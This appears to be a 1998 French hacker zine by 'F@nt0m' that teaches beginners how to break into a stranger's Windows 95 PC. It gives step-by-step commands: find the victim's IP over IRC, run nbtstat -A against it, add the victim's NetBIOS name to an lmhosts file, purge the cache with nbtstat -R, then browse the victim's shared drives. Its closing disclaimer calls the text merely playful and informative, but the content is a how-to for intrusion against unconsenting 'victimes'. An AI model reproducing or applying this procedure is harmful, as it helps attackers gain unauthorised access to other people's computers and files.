From: "- F@nt0m -" <fantom53@hotmail.com>      

Yo !
j'ai écrit c'te doc surtout pouir les débutants qui veulent avec windows
hacker des PC voilà si ca t'interresse
c'est cool =) Merci @+
J'ai d'autres dossiers aussi ..
--
 ________________    __________________________      _____
 \_   _____/  _  \   \      \__    ___/\_____  \    /     \
  |    __)/  /_\  \  /   |   \|    |    /   |   \  /  \ /  \
  |     \/    |    \/    |    \    |   /    |    \/    Y    \
  \___  /\____|__  /\____|__  /____|   \_______  /\____|__  /
      \/         \/         \/                 \/   ©1998 \/

       - ICQ UIN : 3317956 - fantom53@hotmail.com -

 ________________    __________________________      _____    
 \_   _____/  _  \   \      \__    ___/\_____  \    /     \         COMMENT
S'INTRODUIR
  |    __)/  /_\  \  /   |   \|    |    /   |   \  /  \ /  \     SUR UN PC avec
Windows95 ?
  |     \/    |    \/    |    \    |   /    |    \/    Y    \               ---
  \___  /\____|__  /\____|__  /____|   \_______  /\____|__  /  
      \/         \/         \/                 \/         \/                        
DOSSIER N°1
-------------------------------------------------------------------------------------------------
$|$
$|$
$|$ Pour réussir ce Hack il vous faut être sous WIN95 avoir le mode Voisinage réseau (dans
$|$ Panneau de configuration / Réseau / Ajouter / Service / ...)
$|$ Et puis aussi l'adresse IP de votre victime.
$|$
$|$ NB: pour obtenir une IP il suffit de vous connecter sur IRC de taper /DNS pseudo et voilà.
$|$
$|$	*Prendre votre NOTEPAD et créer un fichier que vous nomerez "lmhosts" (ATTENTION il doit
$|$ être en minuscule et NE DOIT PAS porter d'extention *.TXT ..ect...)
$|$
$|$	*Une fois lmhosts créer, le sauver dans le repertoire c:\Windows
$|$
$|$
$|$	*Ouvrir une COMMANDE MSDOS et taper ce qui suit:
$|$
$|$
$|$	nbtstat -A 194.125.163.23  <=== L'IP de votre victime
$|$
$|$
$|$	*Lire les INFOS :
$|$     
$|$
$|$	NetBIOS Remote Machine Name Table Name Type Status
$|$
$|$
$|$		bingo <00> UNIQUE Registered    <=== Ca nous interresse puisque c'est UNIQUE :)
$|$		banco <00> GROUP  Registered	<=== laissez de coté celui-ci
$|$						 NB: l'ordi peut porter n'importe quel nom !!! 	
$|$    	MAC Address = 44-45-13-74-00-00          ici bingo et banco sont des exemples.
$|$
$|$
$|$	*Dans lmhosts je mets :
$|$
$|$		#Hacked by F@nt0m		<= #description..ect...
$|$		194.125.163.23 "bingo"		<= IP de vote victime "nom de l'ordinateur"
$|$
$|$ NB : Par la suite vous pourrez ajouté plusieurs hacks dans le meme fichier sans a avoir 
$|$ à éffacer vos anciens il suffirra d'aller à la ligne pour chacun.
$|$
$|$
$|$	*Retourner sous la fenettre DOS et tapez :
$|$
$|$		nbtstat -R
$|$
$|$	*On Obtient :
$|$
$|$		Successful purge and preload of the NBT Remote Cache Name Table.
$|$
$|$
$|$	*Tout est Bon maintenant on retourne sous WIN95 Menu Démarrer
$|$ Rechercher/Ordinateur...
$|$
$|$ L'ordinateur qui nous interresse ce nome donc "bingo"
$|$ Rechercher le ...
$|$
$|$	*Il le trouve !? Et ben c'est Gagné !!! vous voila dans la machine de votre victime =))
$|$ ALORS HEUREUX ? Ouais c'est cool mais maintenant qu'on est sur l'ordi d'un malheureux qu'est
$|$ ce qu'on fait ? C'est ce qu'on verra dans un prochain numéro ! et en attendant restez calme.
$|$
------------ E-Mail: fantom53@hotmail.com -------------------------------------------------------
AVERTISSEMENT : Ce texte n'as pas été écrit pour que vous fassiez ce qui y est
inscrit il à été
écrit à un but ludique et informatif.Je dégage TOUTES responsabilitées et toutes
les conséquences
que pourait engendrer la mise en pratique de ce qui y est inscrit.
-------------------------------------------------------------------------------------------------
 
